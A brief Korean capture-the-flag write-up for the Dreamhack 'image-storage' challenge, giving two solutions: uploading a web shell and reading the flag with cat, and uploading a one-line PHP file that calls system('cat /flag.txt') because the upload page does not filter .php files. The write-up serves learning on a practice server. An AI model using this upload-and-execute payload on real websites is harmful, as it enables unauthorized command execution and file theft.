< 문제 >
https://dreamhack.io/wargame/challenges/38
image-storage
php로 작성된 파일 저장 서비스입니다. 파일 업로드 취약점을 이용해 플래그를 획득하세요. 플래그는 /flag.txt에 있습니다. Reference Server-side Basic
dreamhack.io
< 풀이 1 >
( 드림핵 제공 )웹 쉘 파일을 업로드 후 해당 파일에 접근하여, pwd 명령을 통해 현재 경로 파악.
cat ../../../../flag.txt 명령으로 flag 획득.
< 풀이 2 >
<?php
system("cat /flag.txt");
?>
업로드 페이지가 php 확장자를 필터링 하고 있지 않으니, 위의 php 코드를 작성하여, 업로드 한다.
해당 파일을 클릭 시 system()함수가 실행되어 Flag 획득이 가능하다.
